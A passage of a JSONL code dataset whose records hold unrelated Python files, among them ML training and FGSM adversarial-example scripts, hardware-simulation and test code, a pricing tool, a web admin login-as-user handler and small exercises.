verbose=2, random_state=17, n_jobs=-1,\n return_train_score=True)\n # data for the train\n train_features, train_labels = train[:, 1:], train[:, 0]\n \n # Fit the random search model\n rf_random.fit(train_features, train_labels)\n \n # Get the best params\n best_grid = rf_random.best_params_\n best_random = rf_random.best_estimator_\n print(best_grid)\n \n #pickle\n pickle_out = open(filename,\"wb\")\n pickle.dump(best_random, pickle_out)\n pickle_out.close()\n \n #open the pickle\n pickle_in = open(filename, \"rb\")\n best_random = pickle.load(pickle_in)\n \n # test features and labels\n # data for the train\n test_features, y_true = test[:, 1:], test[:, 0]\n y_predicted = best_random.predict(test_features)\n return y_predicted, y_true","sub_path":"RF_run.py","file_name":"RF_run.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"648790764","text":"import numpy as np\nimport testing_helpers\nimport parakeet \n\nfrom parakeet.interp import adverb_evaluator as interp\n\nvec = np.array([1,4,9,16])\nmat = np.array([vec, vec+100, vec+200, vec + 300])\n\nexpected_sqrt_vec = np.sqrt(vec)\nexpected_sqrt_mat = np.sqrt(mat)\n\ndef test_map_1d():\n sqrt_vec = interp.eval_map(np.sqrt, values=[vec], axis=0)\n assert testing_helpers.eq(sqrt_vec, expected_sqrt_vec), \\\n \"Expected %s from Map but got %s\" % (expected_sqrt_vec, sqrt_vec)\n\ndef test_map_2d():\n sqrt_mat = interp.eval_map(np.sqrt, values=[mat], axis=0)\n assert testing_helpers.eq(sqrt_mat, expected_sqrt_mat), \\\n \"Expected %s from Map but got %s\" % (expected_sqrt_mat, sqrt_mat)\n\n\"\"\"\ndef sqrt_with_output(x, output):\n output[:] = np.sqrt(x)\n\ndef test_map_2d_output():\n out = np.zeros_like(expected_sqrt_mat)\n interp.eval_map(sqrt_with_output, values=[mat], axis=0, output=out)\n assert testing_helpers.eq(out, expected_sqrt_mat), \\\n \"Expected %s from Map with output param but got %s\" % \\\n (expected_sqrt_mat, out)\n\"\"\"\n\ndef two_first_elts(x):\n return [x[0], x[0]]\n\n\"\"\"\ndef two_first_elts_with_output(x, out):\n out[:] = two_first_elts(x)\n\ndef test_complex_map_2d_output():\n expected = np.array([two_first_elts(x) for x in mat])\n out = np.zeros_like(expected)\n interp.eval_map(two_first_elts_with_output, values=[mat], axis=0, output=out)\n assert testing_helpers.eq(out, expected), \\\n \"Expected %s from Map with output param but got %s\" % \\\n (expected, out)\n\"\"\"\n\nexpected_sum_vec = np.sum(vec)\n\ndef test_reduce_1d():\n vec_sum = interp.eval_reduce(map_fn = interp.identity_function,\n combine = np.add,\n init = 0,\n values = [vec],\n axis = 0)\n\n assert testing_helpers.eq(vec_sum, expected_sum_vec), \\\n \"Expected %s from Reduce but got %s\" % (expected_sum_vec, vec_sum)\n\nexpected_sum_mat = np.sum(mat, axis=0)\n\ndef test_reduce_2d():\n mat_sum = interp.eval_reduce(map_fn = interp.identity_function,\n combine = np.add,\n init = 0,\n values = [mat],\n axis = 0)\n\n assert testing_helpers.eq(mat_sum, expected_sum_mat), \\\n \"Expected %s from Reduce but got %s\" % (expected_sum_mat, mat_sum)\n\n\"\"\"\ndef add_vec_with_output(x, y, out):\n out[:] = x + y\n\ndef test_reduce_2d_output():\n output = np.zeros_like(expected_sum_mat)\n interp.eval_reduce(\n map_fn = interp.identity_function,\n combine = add_vec_with_output,\n init = 0,\n values = [mat],\n axis = 0,\n output = output)\n\n assert testing_helpers.eq(output, expected_sum_mat), \\\n \"Expected %s from Reduce (with output) but got %s\" % \\\n (expected_sum_mat, output)\n\"\"\"\nbool_vec = np.array([True, False, True, False, True])\n\ndef test_bool_sum():\n vec_sum = interp.eval_reduce(\n map_fn = interp.identity_function,\n combine = (lambda x,y: x + y),\n init = 0,\n values = [bool_vec],\n axis = 0)\n assert vec_sum == np.sum(bool_vec), \\\n \"Expected %s but got %s\" % (np.sum(bool_vec), vec_sum)\n\nexpected_cumsum_vec = np.cumsum(vec)\n\ndef test_scan_1d():\n vec_prefixes = interp.eval_scan(map_fn=interp.identity_function,\n combine=np.add,\n emit=interp.identity_function,\n init=0,\n values=[vec],\n axis=0)\n\n assert testing_helpers.eq(vec_prefixes, expected_cumsum_vec), \\\n \"Expected %s from Scan but got %s\" % (expected_cumsum_vec, vec_prefixes)\n\nexpected_cumsum_mat = np.cumsum(mat, axis=0)\n\ndef test_scan_2d():\n mat_prefixes = interp.eval_scan(\n map_fn = interp.identity_function,\n combine = np.add,\n emit = interp.identity_function,\n init = 0,\n values = [mat],\n axis = 0)\n\n assert testing_helpers.eq(mat_prefixes, expected_cumsum_mat), \\\n \"Expected %s from Scan but got %s\" % (expected_cumsum_mat, mat_prefixes)\n\ndef test_allpairs():\n times_table = interp.eval_allpairs(np.multiply, vec, vec, 0)\n np_times_table = np.multiply.outer(vec, vec)\n assert testing_helpers.eq(times_table, np_times_table), \\\n \"Expected %s for AllPairs but got %s\" % \\\n (np_times_table, times_table)\n\n inner_products = interp.eval_allpairs(np.dot, mat, mat.T, 0)\n np_inner_products = np.dot(mat, mat)\n assert testing_helpers.eq(inner_products, np_inner_products), \\\n \"Expected %s for AllPairs but got %s\" % \\\n (inner_products, np_inner_products)\n\ndef test_index_map():\n indices = interp.eval_index_map(interp.identity_function, (10,))\n assert testing_helpers.eq(indices, np.arange(10)), \\\n \"Expected %s from IndexMap but got %s\" % (np.arange(10), indices)\n \ndef test_index_reduce():\n n = 10 \n total = interp.eval_index_reduce(interp.identity_function, np.add, (n,), 0)\n expected = sum(np.arange(10,))\n assert total == expected, \"Expected %d but got %d\" % (expected, total)\n total_no_tuple = interp.eval_index_reduce(interp.identity_function, np.add, n, 0)\n assert total_no_tuple == expected, \"Expected %d but got %d\" % (expected, total_no_tuple )\n\nif __name__ == '__main__':\n testing_helpers.run_local_tests()\n","sub_path":"tests/test_adverb_semantics.py","file_name":"test_adverb_semantics.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"34037184","text":"from PIL import Image\nimport random\nfrom knn import *\n\ndef saveImage(image, filename):\n image.save(filename)\n print(\"Saved image: \"+filename)\n\ndef createEmptyImage(width ,height):\n return Image.new('RGB', (width, height))\n\ndef paintPixel(image, x, y, color):\n image.putpixel((x, y), color)\n\ndef createClasses():\n return ((255, 0, 0), (0, 255, 0), (0, 0, 255))\n\ndef createRandomTrainElements(num, classes):\n array = []\n\n for i in range(num):\n #(x, y, class) tuple structure\n array.append((random.random(), random.random(), random.choice(classes)))\n\n return array\n\ndef VisualizeKNN(filename, width = 100, height = 100, tes=15, k = 5):\n\n # create image to hold data\n img = createEmptyImage(width, height)\n width = width-1\n height = height-1\n\n #create classes and train elements\n elem = createRandomTrainElements(tes, createClasses())\n\n # for each pixel, determine color based on knn\n print(\"Evaluating pixel colors!\")\n for x in range(width+1):\n for y in range(height+1):\n\n nn = NearestNeighbor(elem, (x/width, y/height), k) ##\n #print(str(nn))\n clr = nn[0]\n fp = nn[1] - 0.1\n clr = (int(clr[0]*fp), int(clr[1]*fp), int(clr[2]*fp))\n #paint pixel based on knn\n paintPixel(img, x, y, clr)\n #print(\"set color of \"+str(x)+\", \"+str(y)+ \" to \"+str(clr))\n\n # draw train elements\n print(\"Drawing Elements\")\n for e in elem:\n paintPixel(img, int(e[0]*width), int(e[1]*height), e[2])\n\n saveImage(img, filename)\n\ndef VisualizeWeightedKNN(filename, width=100, height=100, tes=15, k=5, t=0.0):\n # create image to hold data\n img = createEmptyImage(width, height)\n width = width-1\n height = height-1\n\n #create classes and train elements\n elem = createRandomTrainElements(tes, createClasses())\n\n print(\"Weighing elements!\")\n wda= getWeightedDataSetAndAccuracy(elem, k)\n w_elem = wda[0]\n\n\n for item in w_elem:\n print(\"Weighted: \"+str(item))\n\n print(\"\\nWeighting prediction accuracy: \"+str(int(wda[1]*100))+\"%\")\n\n # for each pixel, determine color based on knn\n print(\"Evaluating pixel colors!\")\n for x in range(width+1):\n for y in range(height+1):\n nn = WeightedNearestNeighbor(w_elem, (x/width, y/height), k)\n #nn = NearestNeighbor(elem, (x/width, y/height), k) ##\n #print(str(nn))\n clr = nn[0]\n fp = nn[1] - 0.1\n if nn[1] > t:\n clr = (int(clr[0]*fp), int(clr[1]*fp), int(clr[2]*fp))\n else:\n clr = (150, 150, 150)\n #paint pixel based on knn\n paintPixel(img, x, y, clr)\n #print(\"set color of \"+str(x)+\", \"+str(y)+ \" to \"+str(clr))\n\n # draw train elements\n print(\"Drawing Elements\")\n for e in elem:\n paintPixel(img, int(e[0]*width), int(e[1]*height), e[3])\n\n saveImage(img, filename)\n\ndef svKNN():\n size = int(input(\"What image size? (square): \"))\n tes = int(input(\"How many train elements?: \"))\n k = int(input(\"How large k?: \"))\n\n filename = \"vknn_\"+str(size)+\"_t\"+str(tes)+\"_k\"+str(k)+\".png\"\n\n print(\"Image will be created ( \"+filename+\" ) \\nRunning VisualizeKNN!\")\n VisualizeKNN(filename, size, size, tes, k)\n\ndef svWKNN():\n size = int(input(\"What image size? (square): \"))\n tes = int(input(\"How many train elements?: \"))\n k = int(input(\"How large k?: \"))\n filter = input(\"Exclude under(float 0.0 - 1.0):\")\n try:\n t = float(filter)\n except ValueError:\n t = 0.0\n\n filename = \"vwknn_\"+str(size)+\"_t\"+str(tes)+\"_k\"+str(k)+\".png\"\n\n print(\"Image will be created ( \"+filename+\" ) \\nRunning VisualizeWeightedKNN!\")\n VisualizeWeightedKNN(filename, size, size, tes, k, t)\n\ndef entryPoint():\n\n fun = int(input(\"Choose knn Function: (1) KNN, (2) WeightedKNN\"))\n if fun == 1 :\n svKNN()\n elif fun == 2 :\n svWKNN()\n else :\n print(\"Invalid answer! Shutting down program!\")\n\nentryPoint()\n","sub_path":"visualKNN.py","file_name":"visualKNN.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313426777","text":"# vim:fileencoding=utf-8:ts=2:sw=2:expandtab\n\n\n\n###################################################################################################\n@Expose\ndef Request(self):\n yield\n \n # Read Input\n Account_Contact_MNID = IN_Int(self.Get.id)\n RURI = self.Get.RURI or '/admin/'\n \n # Set the LastURI\n App.SecurityContext.AuthStack.SetLastURI(RURI)\n\n # Execute the Login\n self.Login(Account_Contact_MNID)\n\n # Redirect to handle the account action\n yield self.RedirectResponse('/User/Home/')\n\n\n","sub_path":"Web/acrm/loginasuser.py","file_name":"loginasuser.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"256715470","text":"from migen.fhdl.std import *\nfrom migen.fhdl import verilog\nfrom migen.sim.ipc import *\nfrom migen.sim import icarus\n\nclass TopLevel:\n\tdef __init__(self, vcd_name=None, vcd_level=1,\n\t top_name=\"top\", dut_type=\"dut\", dut_name=\"dut\",\n\t cd_name=\"sys\", clk_period=10):\n\t\tself.vcd_name = vcd_name\n\t\tself.vcd_level = vcd_level\n\t\tself.top_name = top_name\n\t\tself.dut_type = dut_type\n\t\tself.dut_name = dut_name\n\t\t\n\t\tself._cd_name = cd_name\n\t\tself._clk_period = clk_period\n\t\t\n\t\tcd = ClockDomain(self._cd_name)\n\t\tself.clock_domains = [cd]\n\t\tself.ios = {cd.clk, cd.rst}\n\t\n\tdef get(self, sockaddr):\n\t\ttemplate1 = \"\"\"`timescale 1ns / 1ps\n\nmodule {top_name}();\n\nreg {clk_name};\nreg {rst_name};\n\ninitial begin\n\t{rst_name} <= 1'b1;\n\t@(posedge {clk_name});\n\t{rst_name} <= 1'b0;\nend\n\nalways begin\n\t{clk_name} <= 1'b0;\n\t#{hclk_period};\n\t{clk_name} <= 1'b1;\n\t#{hclk_period};\nend\n\n{dut_type} {dut_name}(\n\t.{rst_name}({rst_name}),\n\t.{clk_name}({clk_name})\n);\n\ninitial $migensim_connect(\"{sockaddr}\");\nalways @(posedge {clk_name}) $migensim_tick;\n\"\"\"\n\t\ttemplate2 = \"\"\"\ninitial begin\n\t$dumpfile(\"{vcd_name}\");\n\t$dumpvars({vcd_level}, {dut_name});\nend\n\"\"\"\n\t\tr = template1.format(top_name=self.top_name,\n\t\t\tdut_type=self.dut_type,\n\t\t\tdut_name=self.dut_name,\n\t\t\tclk_name=self._cd_name + \"_clk\",\n\t\t\trst_name=self._cd_name + \"_rst\",\n\t\t\thclk_period=str(self._clk_period/2),\n\t\t\tsockaddr=sockaddr)\n\t\tif self.vcd_name is not None:\n\t\t\tr += template2.format(vcd_name=self.vcd_name,\n\t\t\t\tvcd_level=str(self.vcd_level),\n\t\t\t\tdut_name=self.dut_name)\n\t\tr += \"\\nendmodule\"\n\t\treturn r\n\ndef _call_sim(fragment, simulator):\n\tfor s in fragment.sim:\n\t\tif simulator.cycle_counter >= 0 or (hasattr(s, \"initialize\") and s.initialize):\n\t\t\ts(simulator)\n\nclass Simulator:\n\tdef __init__(self, fragment, top_level=None, sim_runner=None, sockaddr=\"simsocket\", **vopts):\n\t\tif not isinstance(fragment, Fragment):\n\t\t\tfragment = fragment.get_fragment()\n\t\tif top_level is None:\n\t\t\ttop_level = TopLevel()\n\t\tif sim_runner is None:\n\t\t\tsim_runner = icarus.Runner()\t\t\n\t\tself.fragment = fragment + Fragment(clock_domains=top_level.clock_domains)\n\t\tself.top_level = top_level\n\t\tself.ipc = Initiator(sockaddr)\n\t\tself.sim_runner = sim_runner\n\t\t\n\t\tc_top = self.top_level.get(sockaddr)\n\t\t\n\t\tc_fragment, self.namespace = verilog.convert(self.fragment,\n\t\t\tios=self.top_level.ios,\n\t\t\tname=self.top_level.dut_type,\n\t\t\treturn_ns=True,\n\t\t\t**vopts)\n\t\t\n\t\tself.cycle_counter = -1\n\t\tself.interrupt = False\n\n\t\tself.sim_runner = sim_runner\n\t\tself.sim_runner.start(c_top, c_fragment)\n\t\tself.ipc.accept()\n\t\treply = self.ipc.recv()\n\t\tassert(isinstance(reply, MessageTick))\n\t\t_call_sim(self.fragment, self)\n\t\n\tdef run(self, ncycles=-1):\n\t\tself.interrupt = False\n\t\tcounter = 0\n\t\twhile not self.interrupt and (ncycles < 0 or counter < ncycles):\n\t\t\tself.cycle_counter += 1\n\t\t\tcounter += 1\n\t\t\tself.ipc.send(MessageGo())\n\t\t\treply = self.ipc.recv()\n\t\t\tassert(isinstance(reply, MessageTick))\n\t\t\t_call_sim(self.fragment, self)\n\n\tdef rd(self, item, index=0):\n\t\tname = self.top_level.top_name + \".\" \\\n\t\t + self.top_level.dut_name + \".\" \\\n\t\t + self.namespace.get_name(item)\n\t\tself.ipc.send(MessageRead(name, Int32(index)))\n\t\treply = self.ipc.recv()\n\t\tassert(isinstance(reply, MessageReadReply))\n\t\tif isinstance(item, Memory):\n\t\t\tsigned = False\n\t\t\tnbits = item.width\n\t\telse:\n\t\t\tsigned = item.signed\n\t\t\tnbits = flen(item)\n\t\tvalue = reply.value & (2**nbits - 1)\n\t\tif signed and (value & 2**(nbits - 1)):\n\t\t\tvalue -= 2**nbits\n\t\treturn value\n\t\n\tdef wr(self, item, value, index=0):\n\t\tname = self.top_level.top_name + \".\" \\\n\t\t + self.top_level.dut_name + \".\" \\\n\t\t + self.namespace.get_name(item)\n\t\tif isinstance(item, Memory):\n\t\t\tnbits = item.width\n\t\telse:\n\t\t\tnbits = flen(item)\n\t\tif value < 0:\n\t\t\tvalue += 2**nbits\n\t\tassert(value >= 0 and value < 2**nbits)\n\t\tself.ipc.send(MessageWrite(name, Int32(index), value))\n\t\n\tdef multiread(self, obj):\n\t\tif isinstance(obj, Signal):\n\t\t\treturn self.rd(obj)\n\t\telif isinstance(obj, list):\n\t\t\tr = []\n\t\t\tfor item in obj:\n\t\t\t\trd = self.multiread(item)\n\t\t\t\tif isinstance(item, Signal) or rd:\n\t\t\t\t\tr.append(rd)\n\t\t\treturn r\n\t\telif hasattr(obj, \"__dict__\"):\n\t\t\tr = {}\n\t\t\tfor k, v in obj.__dict__.items():\n\t\t\t\trd = self.multiread(v)\n\t\t\t\tif isinstance(v, Signal) or rd:\n\t\t\t\t\tr[k] = rd\n\t\t\treturn r\n\t\n\tdef multiwrite(self, obj, value):\n\t\tif isinstance(obj, Signal):\n\t\t\tself.wr(obj, value)\n\t\telif isinstance(obj, list):\n\t\t\tfor target, source in zip(obj, value):\n\t\t\t\tself.multiwrite(target, source)\n\t\telse:\n\t\t\tfor k, v in value.items():\n\t\t\t\tself.multiwrite(getattr(obj, k), v)\n\n\tdef __del__(self):\n\t\tdel self.ipc\n\t\tdel self.sim_runner\n\n# Contrary to multiread/multiwrite, Proxy fetches the necessary signals only and\n# immediately forwards writes into the simulation.\nclass Proxy:\n\tdef __init__(self, sim, obj):\n\t\tself.__dict__[\"_sim\"] = sim\n\t\tself.__dict__[\"_obj\"] = obj\n\t\n\tdef __getattr__(self, name):\n\t\titem = getattr(self._obj, name)\n\t\tif isinstance(item, Signal):\n\t\t\treturn self._sim.rd(item)\n\t\telif isinstance(item, list):\n\t\t\treturn [Proxy(self._sim, si) for si in item]\n\t\telse:\n\t\t\treturn Proxy(self._sim, item)\n\n\tdef __setattr__(self, name, value):\n\t\titem = getattr(self._obj, name)\n\t\tassert(isinstance(item, Signal))\n\t\tself._sim.wr(item, value)\n","sub_path":"migen/sim/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"3896037","text":"from ChannelChild import ChannelChild\nimport pandas as pd\n\n\nclass Channel:\n tab_name = ''\n channel_name = ''\n channel_id = ''\n channel_type = ''\n children = []\n found_children = []\n mvr_price = 0.00\n tier1_price = 0.00\n tier2_price = 0.00\n tier3_price = 0.00\n\n def __init__(self):\n pass\n\n def capture_channel_information(self, channel_name, input_channel):\n \"\"\" captures the channel information from the spreadsheet \"\"\"\n self.tab_name = channel_name\n self.channel_id = input_channel[2]\n self.channel_name = input_channel[3]\n self.channel_type = input_channel[6]\n self.get_channel_pricing()\n\n def capture_missing_information(self, channel_name, input_channel):\n self.tab_name = channel_name\n self.channel_name = channel_name\n\n def get_children_from_database(self, input_conn, input_cur):\n child_query = \"\"\"select * from account_association where association_id = '%s'\"\"\"\n input_cur.execute(child_query % self.channel_id)\n self.found_children = input_cur.fetchall()\n for child in self.found_children:\n new_child = ChannelChild()\n new_child.child_id = child[0]\n new_child.child_name = child[1]\n new_child.check_price(input_cur)\n self.children.append(new_child)\n\n def get_children_from_spreadsheet(self):\n \"\"\" gets the children listed under the given association from the spreadsheet \"\"\"\n pass\n\n def compare_channel_children(self):\n \"\"\" compares the list of children from the spreadsheet and the database \"\"\"\n \"\"\" should log any differences found to a log file for further study \"\"\"\n pass\n\n def get_channel_pricing(self):\n print('****' + self.channel_name)\n print(self.channel_id)\n df = pd.read_excel('Channel Partner Assocation Reseller Pricing Detail.xlsx', self.tab_name, header=0)\n fee_columns = [x for x in df.columns if \"Fees\" in x and \"Baseline\" not in x]\n if len(fee_columns) == 0:\n df = pd.read_excel('Channel Partner Assocation Reseller Pricing Detail.xlsx', self.tab_name, header=1)\n fee_columns = [x for x in df.columns if \"Fees\" in x and \"Baseline\" not in x]\n self.get_pricing_info(df, fee_columns)\n self.print_pricing_info()\n\n\n def get_fee_type(self, current_data):\n # function to determine the fee type for a given current data set\n return_type = \"\"\n if \"MVR\" in current_data:\n return_type = \"mvr\"\n elif \"25,000\" in current_data:\n return_type = \"tier1\"\n elif \"25,001\" in current_data:\n return_type = \"tier2\"\n elif \"+\" in current_data:\n return_type = \"tier3\"\n\n return return_type\n\n def set_fee_value(self, value, type):\n if type == 'mvr':\n self.mvr_price = value\n\n if type == 'tier1':\n self.tier1_price = value\n\n if type == 'tier2':\n self.tier2_price = value\n\n if type == 'tier3':\n self.tier3_price = value\n\n def get_pricing_info(self, df, fee_columns):\n for fee_column in fee_columns:\n current_data = df[fee_column]\n type = self.get_fee_type(fee_column)\n # print(type)\n current_data = [x for x in current_data if x > 0]\n current_data = list(set(current_data))\n if len(current_data) == 0:\n # print('${:,.2f}'.format(0.00))\n self.set_fee_value(0.00, type)\n elif len(current_data) == 1:\n # all prices the same for a given channel\n # print('${:,.2f}'.format(current_data[0]))\n self.set_fee_value(current_data[0], type)\n elif len(current_data) > 1:\n # this is for different prices\n print(current_data)\n\n def write_channel_pricing_info(self):\n \"\"\"\n function to write the pricing information to the channel_products table\n :return:\n\n \"\"\"\n pass\n\n def print_pricing_info(self):\n print('MVR ' + '${:,.2f}'.format(self.mvr_price))\n print('Tier 1 ' + '${:,.2f}'.format(self.tier1_price))\n print('Tier 2 ' + '${:,.2f}'.format(self.tier2_price))\n print('Tier 3 ' + '${:,.2f}'.format(self.tier3_price))\n\n def print_children(self):\n for child in self.children:\n print('\\t' + child.child_name)\n print('\\t' + child.child_id)\n print('\\t' + child.mvr_fees)\n\n def print_channel_info(self):\n print('*********************')\n print(self.channel_name)\n print(self.channel_id)\n print(self.channel_type)\n self.print_children()\n\n\n","sub_path":"channel_partner_data_population/Channel.py","file_name":"Channel.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"542766597","text":"# -*- coding: utf-8 -*-\ndef melinha (matriz):\n for i in range (0,matriz.shape[0],1):\n for i in range (0,matriz.shape[1],1):\n if matriz[i,j]==1:\n return(i)\ndef mecoluna (matriz):\n j=0\n while j coins:\n break\n factor = 1 if count % 2 == 1 else -1\n currentPartitions += factor * partitions[coins - small]\n if big <= coins:\n currentPartitions += factor * partitions[coins - big]\n count += 1\n partitions.append(currentPartitions % divisor)\n return coins\n\n def solution(self):\n return self.minCoinsWithPartitionsDivisibleBy(10**6)\n\n def test(self):\n assert self.minCoinsWithPartitionsDivisibleBy(7) == 5\n\nSolver = Problem078\n","sub_path":"Solutions/Problems 076-100/Problem078.py","file_name":"Problem078.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78297448","text":"import MyModel\r\nimport torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport foolModel\r\n\r\ntoPIL=transforms.ToPILImage()\r\ntoTensor=transforms.ToTensor()\r\n# device configuration\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n\r\n# load model\r\nnet = MyModel.LeNet_my(10).to(device)\r\n\r\n# load pretrained parameters\r\ncheckpoint = torch.load('../pretrainModel/ResNet_MNIST.ckpt',map_location = device)\r\nnet.load_state_dict(checkpoint)\r\n\r\ntest_data = torchvision.datasets.MNIST(root='../ImageData', train=False, transform=toTensor,\r\n download=True) # download testing data set\r\n\r\nimageNum = len(test_data)\r\n\r\ntest_loader = torch.utils.data.DataLoader(dataset = test_data,\r\n batch_size = 100,\r\n shuffle = False)\r\n\r\ntotal = 0\r\ncorrect = 0\r\n\r\nfor i, (images,labels) in enumerate(test_loader):\r\n\r\n netInput = torch.autograd.Variable(images,requires_grad = True)\r\n\r\n grad_sign = foolModel.FGSM(net,netInput.to(device),labels.long().to(device))\r\n image_perturbated = (images + 1*grad_sign.cpu()).numpy()\r\n image_perturbated = np.clip(image_perturbated,0,1)\r\n image_perturbated = torch.Tensor(image_perturbated).to(device)\r\n\r\n net.eval()\r\n\r\n outputs = net(image_perturbated)\r\n _,predicted = torch.max(outputs.data, 1)\r\n\r\n total += labels.size(0)\r\n correct += (predicted.cpu() == labels).sum().item()\r\n\r\n\r\n print(i)\r\n pass\r\n\r\nprint('Test Accuracy of the model on the 10000 test images: {} %'.format(100 * correct / total))\r\n\r\nprint('finish')","sub_path":"classification/foolMNIST.py","file_name":"foolMNIST.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584835592","text":"##\n## Programación con Pandas\n## ===========================================================================\n##\n## Construya una tabla que contenga _c0 y una lista\n## separada por ',' de los valores de la columna _c5a\n## y _c5b (unidos por ':') de la tabla tbl2.tsv\n## \n## Rta/\n## _c0 lista\n## 0 0 bbb:0,ddd:9,ggg:8,hhh:2,jjj:3\n## 1 1 aaa:3,ccc:2,ddd:0,hhh:9\n## ...\n## 38 38 eee:0,fff:9,iii:2\n## 39 39 ggg:3,hhh:8,jjj:5\n##\n## >>> Escriba su codigo a partir de este punto <<<\n##\nimport pandas as pd\ndata = pd.read_csv('tbl2.tsv',sep='\\t')\ndata = data.sort_values(['_c0','_c5a'])\ndata['unidos'] = list(map(lambda a,b: str(a) + ':' + str(b), data['_c5a'], data['_c5b']))\ndata = data.groupby('_c0')['unidos'].apply(lambda a: ','.join(a)).reset_index()\ndata.columns = ['_c0','lista']\nprint(data)\n","sub_path":"04-pandas=1/q10=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"537595399","text":"import mock\nimport pytest\nfrom starlette.testclient import TestClient\n\nimport app.worker\nfrom app.db_models import sa\nfrom app.api.auth.api_v1 import get_current_user\n\n\n@pytest.mark.skip\n@pytest.mark.parametrize(\n \"url\", [\"/bgm.tv/api.v0/subject/player/233593\", \"/bgm.tv/api.v0/ep/player/233593\",]\n)\ndef test_submit_subject_id_require_auth(client: TestClient, url):\n r = client.put(\n url, json={\"bangumi_id\": \"string\", \"source\": \"bilibili\", \"subject_id\": 288,}\n )\n assert r.status_code == 403, \"user submit subject_id don't need auth\"\n\n\n@pytest.mark.skip\ndef test_submit_subject_url(client: TestClient,):\n async def mock_get_current_user():\n return sa.UserToken(user_id=233)\n\n client.app.dependency_overrides[get_current_user] = mock_get_current_user\n subject_id = 233593\n url = \"https://www.bilibili.com/bangumi/play/ep262002\"\n with mock.patch(\"app.worker.submit_bangumi\"):\n r = client.put(f\"/bgm.tv/api.v0/subject/player/{subject_id}\", json={\"url\": url})\n assert r.status_code == 200, r.text\n app.worker.submit_bangumi.delay.assert_called_once_with(subject_id, url)\n assert r.status_code == 200, r.text\n\n\n@pytest.mark.skip\ndef test_submit_ep_url(client: TestClient,):\n async def mock_get_current_user():\n return sa.UserToken(user_id=233)\n\n client.app.dependency_overrides[get_current_user] = mock_get_current_user\n ep_id = 2891213\n url = \"https://www.bilibili.com/bangumi/play/ep276479\"\n with mock.patch(\"app.worker.submit_ep\"):\n r = client.put(f\"/bgm.tv/api.v0/ep/player/{ep_id}\", json={\"url\": url})\n assert r.status_code == 200, r.text\n app.worker.submit_ep.delay.assert_called_once_with(ep_id, url)\n\n assert r.status_code == 200, r.text\n","sub_path":"tests/app/api/bgm_tv/test_submit_player_page.py","file_name":"test_submit_player_page.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"632771768","text":"from rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"HEX API\",\n default_version='v1',\n description=\"API version 1 for Test Services\",\n contact=openapi.Contact(email=\"oliver.koyoc@gmail.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=False,\n permission_classes=(permissions.IsAuthenticated,),\n)\n","sub_path":"mutationAPI/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"542854595","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom globeos.scenes.basescene import basescene\nimport warnings\nimport os \nfrom globeos.managers.imagemanager import imagemanager\nimport pygame \n\nclass imagescene(basescene):\n def __init__(self, globe, screen, args={}):\n super(imagescene, self).__init__(globe, screen)\n self.imagemanager = imagemanager()\n \n if('filename' not in args):\n warnings.warn(\"No Image Selected - Loading Default\")\n filename = os.getcwd()+\"\\images\\globe2.jpg\"\n self.imagemanager.loadimage(filename)\n else:\n self.imagemanager.loadimage(args['filename'])\n return\n \n def run(self):\n while not self.done:\n hevent = None\n for event in pygame.event.get(): \n hevent = self.inputmanager.handleinput(event)\n super(imagescene, self).defaultevents(hevent)\n self.surfarr = self.imagemanager.setimage(self.globe, self.surfarr)\n super(imagescene, self).draw()\n return self.nextscenename\n \n","sub_path":"globeos/scenes/imagescene.py","file_name":"imagescene.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"607646371","text":"import os\nimport glob\nimport random\nimport numpy as np\nimport cv2\n\n\nclass Generator(object):\n sample = 'sample'\n label = 'label'\n augment = 'augment'\n\n # def __init__(self, path='/media/HDD-2T/DATA/ISBI_2019',labels=['cancer','normal'],folds = ['fold_1','fold_2','fold_3','fold_4'],type='train'):\n def __init__(self, path,labels,folds,type_set):\n '''\n example\n def __init__(self, path='/media/HDD-2T/DATA/ISBI_2019',labels=['cancer','normal'],folds = ['fold_1','fold_2','fold_3','fold_4'],type='train)\n '''\n self.type = type_set # 'train' or 'val'\n self.all_samples = self.generate_all_samples_dict(path, labels, folds)\n np.random.shuffle(self.all_samples['cancer'])\n np.random.shuffle(self.all_samples['normal'])\n self.length = len(self.all_samples['cancer']) + len(self.all_samples['normal'])\n self.pos_weight = len(self.all_samples['normal'])/len(self.all_samples['cancer'])\n print('>>>>>>>>>>>>>>. post weight: ', self.pos_weight)\n print('num_cancer: ', len(self.all_samples['cancer']))\n print('num_norma;: ', len(self.all_samples['normal']))\n # input('lakag matatg')\n\n def 